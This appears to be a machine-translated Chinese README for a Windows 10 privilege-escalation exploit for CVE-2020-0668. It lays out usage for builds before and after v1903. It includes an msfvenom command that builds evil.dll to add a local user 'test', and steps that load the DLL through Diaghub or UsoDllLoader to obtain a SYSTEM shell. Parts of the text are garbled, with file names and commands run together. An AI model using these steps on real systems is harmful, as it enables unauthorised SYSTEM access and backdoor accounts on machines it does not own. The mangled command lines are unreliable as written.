使 CVE-2020-0668 漏洞利用适用于 win10 v1903 以下版本和 win10 v1903 及以上版本
PowerShell 漏洞利用适用于 Diaghub 的 win10 v1903 以下版本。
evil.dll
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1Diaghub.exe C:\ProgramData evil.dll 以加载 dll 并添加用户。
PowerShell 漏洞利用适用于 UsoDllLoader 的 win10 v1903 及以上版本。
exp.ps1UsoDllLoader.exe 获取系统 shell
针对 SysTracingPoc 的 x86 发行版,用于 issue,由于 UsoLoadDll,该漏洞利用适用于 win10 v1903 及以上版本。
一个 .Net PoC。如果你查看 C:\Windows\System32\evil.dll 并将其重命名为 evil.txt,你会发现它不是一个 dll 文件,其中仅包含跟踪日志。
一个 PowerShell PoC。同样,evil.dll 中也只包含跟踪日志。